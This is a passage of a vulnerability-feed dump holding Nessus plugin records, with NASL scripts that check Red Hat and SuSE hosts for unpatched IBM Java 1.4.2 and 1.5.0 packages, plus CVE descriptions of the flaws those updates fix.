value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1643\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-demo-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-devel-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", cpu:\"s390\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"java-1.4.2-ibm-plugin-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-src-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-demo-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-devel-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"s390\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.4.2-ibm-plugin-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-src-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-demo-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-devel-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.4.2-ibm-plugin-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-src-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.4.2-ibm / java-1.4.2-ibm-demo / java-1.4.2-ibm-devel / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:44:38", "description": "IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/", "edition": 24, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6741)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_5_0-IBM-6741.NASL", "href": "https://www.tenable.com/plugins/nessus/49863", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49863);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-2493\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6741)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2493.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3868.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3872.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3873.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3877.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6741.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-demo-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-src-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:44:37", "description": "IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/", "edition": 24, "published": "2010-01-08T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6740)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2010-01-08T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_5_0-IBM-6740.NASL", "href": "https://www.tenable.com/plugins/nessus/43822", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43822);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-2493\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6740)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2493.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3868.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3872.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3873.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n 